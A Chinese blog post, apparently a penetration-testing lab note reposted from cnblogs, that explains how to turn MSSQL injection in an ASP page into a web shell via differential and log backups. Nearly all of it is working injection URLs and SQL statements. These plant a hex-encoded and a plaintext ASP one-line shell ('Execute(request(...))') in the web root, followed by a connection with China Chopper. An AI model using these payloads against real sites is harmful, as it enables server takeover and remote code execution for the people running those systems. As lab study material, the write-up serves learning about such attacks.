标签：shell 备份 cmd id sqli 大哥 asp mssql

任务二 注入点拿shell

路径的爆破

https://blog.csdn.net/edu_aqniu/article/details/78409451

0X01判断 是否为判断当前数据库用户名是否为DB_OWNER：

是

 

 

Mssql拿shell有两种方法 win2008sever里面

0X02数据库备份拿shell

0X001 创建自己的数据库

http://www.aspx-sqli.com/index.asp?id=1;create%20database%20zhong;

 

 

 

0X002先进行一次完整备份：

?id=1;backup database zhong to disk = 'E:\wwwroot\asp_sqli';

 

 

0X003使用数据库：

http://www.aspx-sqli.com/index.asp?id=1;use%20zhong;

 

 

0x004创建新表：在数据库名为中的库里面创建一个新的cmd表

create table [dbo].[zhong] ([cmd] [image]);

 

 

0X006向cmd表中插入数据

?id=1;insert into zhong(cmd) values(0x3C25657865637574652872657175657374282276616C7565222929253E);

 

 

 

0X007进行数据库的差异备份

?id=1;backup database zhong to disk='E:\wwwroot\asp_sqli\zhongqzi.asp' WITH DIFFERENTIAL,FORMAT;

 

 

然后菜刀连接

 

 

0X03log备份拿shell

0X001 激活为还原模式

这里要注意的是我们通过备份拿shell 要注意是需要进行数据库的

LOG备份需要先把指定的数据库激活为还原模式，所以需要执行alter database XXX set RECOVERY FUL，而差异备份不需要，所以只有这条语句的就是LOG备份

?id=1;alter database asp_test set RECOVERY FULL –

 

 

0X002创建新的表cmd

?id=1;create table cmd (a image) –

 

 

0X003备份当前库的log到网站根目录

?id=1;backup log asp_test to disk = 'E:\wwwroot\asp_sqli\zhong.asp' with init –

 

 

0X004在cmd表的a列中插入一句话

 

insert into cmd (a) values ('<%%25Execute(request("go"))%
%25>')--

 

0X005备份差异log

;backup log asp_test to disk = 'E:\wwwroot\asp_sqli\zhongqi.asp' --

 

 

 

0x006 菜刀连接

 ----致谢 卿哥

https://www.cnblogs.com/-qing-/p/10364190.html

带我们一点一点了解渗透

学习之路 少就是多 慢就是快

标签：shell,备份,cmd,id,sqli,大哥,asp,mssql
来源： https://www.cnblogs.com/-zhong/p/10946456.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。